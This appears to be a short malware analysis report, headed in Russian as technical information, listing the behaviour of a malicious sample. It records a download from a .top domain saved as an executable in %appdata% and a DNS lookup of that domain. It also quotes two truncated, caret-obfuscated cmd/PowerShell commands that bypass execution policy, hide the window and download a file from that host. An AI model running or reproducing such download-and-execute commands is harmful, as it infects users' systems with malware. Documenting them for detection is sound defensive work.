Техническая информация
- http://dpolly-dolly.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWErs^He^ll^.ex^E -^EXEcuT^Ion^pO^licY^ ^byP^as^S -nOPro^Fi^Le ^-wI^ND^ow^s^TyL^E hIDden^ ^(^new-O^BJ^eCT^ SYsTEm.n^ET.w^EbClIE^N^t)^.^d^oW^NL^O^ad^FIlE('http://dpolly-doll...
- DNS ASK dp####-dolly.top
- '<SYSTEM32>\cmd.exe' /c "poWErs^He^ll^.ex^E -^EXEcuT^Ion^pO^licY^ ^byP^as^S -nOPro^Fi^Le ^-wI^ND^ow^s^TyL^E hIDden^ ^(^new-O^BJ^eCT^ SYsTEm.n^ET.w^EbClIE^N^t)^.^d^oW^NL^O^ad^FIlE('http://dpolly-doll...' (со скрытым окном)